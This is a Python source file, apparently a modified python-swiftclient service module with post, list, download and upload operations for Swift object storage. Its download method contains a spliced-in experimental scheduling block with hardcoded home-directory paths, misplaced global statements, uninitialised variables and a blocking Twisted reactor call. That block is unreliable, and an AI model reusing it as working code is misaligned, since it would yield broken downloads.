res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
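# Sketch of typical post() usage (names are placeholders); metadata strings use
# the 'Key:Value' form consumed by split_headers:
#   with SwiftService() as swift:
#       swift.post(container='images', options={'meta': ['Owner:alice']})
#       for res in swift.post(container='images',
#                             objects=[SwiftPostObject('a.png',
#                                                      options={'meta': ['Tag:x']})]):
#           print(res['success'])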
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account, container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
rq = Queue(maxsize=10) # Just stop list running away consuming memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
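# list() yields pages rather than individual names (sketch; names are placeholders):
#   with SwiftService() as swift:
#       for page in swift.list(container='images', options={'prefix': '2023/'}):
#           if page['success']:
#               for item in page['listing']:
#                   print(item['name'])
#           else:
#               raise page['error']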
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix']
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
error = None
try:
while True:
_, items = conn.get_container(
container, marker=marker, prefix=options['prefix'],
delimiter=options['delimiter']
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
# Scheduling state for the timeslot-based download experiment; all globals are
# declared once, before their first assignment, to avoid duplicate declarations.
algoChoice = 0
global timeline, countNotAssigned1, savedObs, transferedThr, nbslots, iTransList
global rejR, sched_dict, sum_meet_deadline, sum_data, avail_bw, sum_bw_consumption
global usedThr_dict
timeline = 30
ts = swiftclient.functions.tscalcul()
nbMaxThr = 100
countNotAssigned1 = 0
transferedThr = []
nbslots = [0] * 1200
rejR = []
sched_dict = defaultdict(list)
usedThr_dict = defaultdict(lambda: 0)
now = datetime.datetime.now()
print(datetime.datetime.now())
end = now + datetime.timedelta(seconds=timeline)
print(end);
tsNum = 0;
print("timeline = ", timeline)
l = [];
l.append(now);
'''objects2 = ["4_/home/AN28060/Desktop/d4 (copy).txt", "5_/home/AN28060/Desktop/d5 (copy).txt",
"4_/home/AN28060/Desktop/d42 (copy).txt", "4_/home/AN28060/Desktop/d43 (copy).txt",
"5_/home/AN28060/Desktop/d51 (copy).txt", "6_/home/AN28060/Desktop/d6 (copy).txt",
"6_/home/AN28060/Desktop/d61 (copy).txt", "7_/home/AN28060/Desktop/d7 (copy).txt",
"7_/home/AN28060/Desktop/d71 (copy).txt", "8_/home/AN28060/Desktop/d8 (copy).txt",
"8_/home/AN28060/Desktop/d81 (copy).txt", "8_/home/AN28060/Desktop/d82 (copy).txt"]'''
#objects2 = ["403K/403K_1.dat"]
objects1 = glob.glob("/home/AN28060/WorkSpace/Scripts/403K/*.dat")
objects3 = glob.glob("/home/AN28060/WorkSpace/Scripts/678B/*.dat")
objects2 = glob.glob("/home/AN28060/WorkSpace/Scripts/678B/*.dat")
objects4 = glob.glob("/home/AN28060/WorkSpace/Scripts/26K/*.dat")
objects5 = glob.glob("/home/AN28060/WorkSpace/Scripts/403K/*.dat")
objects6 = glob.glob("/home/AN28060/WorkSpace/Scripts/678B/*.dat")
sum_bw_consumption = 0
while now <= end and tsNum < timeline:
now += datetime.timedelta(seconds=ts);
print ("now",now)
l.append(now);
if l[tsNum + 1] == l[tsNum] + datetime.timedelta(seconds=ts):
tsNum = tsNum + 1
print(" tsnum :", tsNum)
swiftclient.shell.sum_data = 0
if tsNum == 1:
objects=[]
for i in range(len(objects1)):
objects.append(objects1[i].split("/",5)[5])
print("o",objects);
if tsNum == 2:
for i in range(len(objects2)):
iTransList.append(objects2[i].split("/",5)[5])
objs = iTransList; print("objects = ", objects);
if tsNum == 3:
for i in range(len(objects3)):
iTransList.append(objects3[i].split("/",5)[5]) ;
for i in range(len(objects4)):
iTransList.append(objects4[i].split("/",5)[5])
objs = iTransList; print("objects = ", objects)
if tsNum == 4:
for i in range(len(objects5)):
iTransList.append(objects5[i].split("/",5)[5]) ;
for i in range(len(objects6)):
iTransList.append(objects6[i].split("/",5)[5])
objs = iTransList; print("objects = ", objects)
sched_dict, objs, iTransList = swiftclient.scheduling.schedule_requests_per_ts(algoChoice, tsNum, ts, nbMaxThr, timeline, objects);
# else: objs = objects ;
print (" ************************ iTransList",iTransList)
if algoChoice == 1:
nbslots = swiftclient.scheduling.checkRequestScheduled(objs);
print("nbslots ", nbslots);
print("objs", objs);
sched_dict = swiftclient.scheduling.switchTS(tsNum, ts, objs, nbslots, nbMaxThr, timeline, sched_dict, usedThr_dict);
sleep(ts);
print ("objs",objs) ; '''objects = objects.extend(iTransList);
for i in range(len(objs)):
if len(objs[i].split("_", 1)) == 2:
objects.append(objs[i].split("_", 1)[1])
i = i + 1'''
objects = []
print(len(sched_dict))
if tsNum in sched_dict: print(sched_dict[tsNum])
for i in range(len(objs)):
print("len(objs[i].split('_'))", len(objs[i].split("_")))
# maxsplit=2 so that names carrying two '_' separators can actually reach the len == 3 branch below
parts = objs[i].split("_", 2)
if objs[i] in sched_dict[tsNum] and len(parts) == 2:
objects.append(parts[1])
if objs[i] in sched_dict[tsNum] and len(parts) == 3:
print("here")
objects.append(parts[1] + "_" + parts[2])
print ("objects to download ", objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
print(swiftclient.shell.down_dict)
if len(swiftclient.shell.down_dict) != 0:
proportion = swiftclient.shell.sum_meet_deadline / len(swiftclient.shell.down_dict)
print("sum_meet_deadline ", swiftclient.shell.sum_meet_deadline)
print("proportion_meet_deadline ", proportion)
print("sum_data ", swiftclient.shell.sum_data)
avail_bw = swiftclient.shell.sum_data / swiftclient.functions.tscalcul()
print("avail_bw", avail_bw)
sum_bw_consumption += avail_bw
#timerThread = threading.Thread(target=self.foo()) ; timerThread.start()
#example = ThreadingExample(); sleep(3); print('Checkpoint'); sleep(2); print('Bye')
#sleep(1) ; #print('Doing something important in the background', swiftclient.shell.sum_data);previous_data = swiftclient.shell.sum_data ;
l = task.LoopingCall(self.doWork)
l.start(5)
reactor.run()
#exit()
avg_bw_consumption = sum_bw_consumption / tsNum
print("sum_bw_consumption", sum_bw_consumption, "tsNum", tsNum)
'''def f(self):
global sum_bw_consumption
print(sum_bw_consumption,"***************************************************************************************************************")# do something here ...
# call f() again in 60 seconds
threading.Timer(60, self.f()).start()'''
def doWork(self):
print (" do work here")
pass
def foo(self):
next_call = time()
while True:
print ( datetime.datetime.now())
next_call = next_call + 1;
sleep(next_call - time())
def schedule_requests1(algoChoice, timeline, objects): # timeline is the number of timeslots
ts = swiftclient.functions.tscalcul();
nbMaxThr = 100;
global countNotAssigned1, savedObs, transferedThr, nbslots, iTransList
global rejR, sched_dict, usedThr_dict
countNotAssigned1 = 0
transferedThr = []
nbslots = [0] * 1200
rejR = []
sched_dict = defaultdict(list)
usedThr_dict = defaultdict(lambda: 0)
now = datetime.datetime.now()
print(datetime.datetime.now())
end = now + datetime.timedelta(seconds=timeline)
print(end);
tsNum = 0;
print("timeline = ", timeline)
l = [];
l.append(now);
objects2 = ["4_/home/AN28060/Desktop/d4 (copy).txt", "5_/home/AN28060/Desktop/d5 (copy).txt",
"4_/home/AN28060/Desktop/d42 (copy).txt", "4_/home/AN28060/Desktop/d43 (copy).txt",
"5_/home/AN28060/Desktop/d51 (copy).txt", "6_/home/AN28060/Desktop/d6 (copy).txt",
"6_/home/AN28060/Desktop/d61 (copy).txt", "7_/home/AN28060/Desktop/d7 (copy).txt",
"7_/home/AN28060/Desktop/d71 (copy).txt", "8_/home/AN28060/Desktop/d8 (copy).txt",
"8_/home/AN28060/Desktop/d81 (copy).txt", "8_/home/AN28060/Desktop/d82 (copy).txt"]
while now <= end and tsNum < timeline:
now += datetime.timedelta(seconds=ts);
l.append(now);
if l[tsNum + 1] == l[tsNum] + datetime.timedelta(seconds=ts):
tsNum = tsNum + 1;
print(" tsnum :", tsNum);
sched_dict, objs, iTransList = schedule_requests_per_ts(algoChoice, tsNum, ts, nbMaxThr, timeline,
objects);
if tsNum == 4: iTransList.extend(objects2);objs = iTransList; print("objects = ", objects)
# else: objs = objects ;
if algoChoice == 1:
nbslots = checkRequestScheduled(objs);
print("nbslots ", nbslots);
print("objs", objs);
sched_dict = switchTS(tsNum, ts, objs, nbslots, nbMaxThr, timeline, sched_dict, usedThr_dict);
sleep(ts)  # 'time' is rebound to the time() function by 'from time import *' above, so call sleep() directly
return sched_dict
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb')
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(65536)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': 65536,
'headers': req_headers,
'response_dict': results_dict}
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb')
else:
if basename(path):
fp = open(path, 'wb')
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if 'x-object-meta-mtime' in headers and not no_file:
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises: SwiftError
:raises: ClientException
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
# In case we have a pseudo-folder path for the <container> arg, derive
# the container name from the top path and prepend the rest to
# the object name (same as passing --object-name).
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# Wait for the first container job to complete before possibly attempting
# the segment container job, because the segment container job may
# attempt to HEAD the first container.
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
try:
fp = open(path, 'rb')
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
try:
fp = open(path, 'rb')
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(65536, to_read))
if not data:
return False
md5sum.update(data)
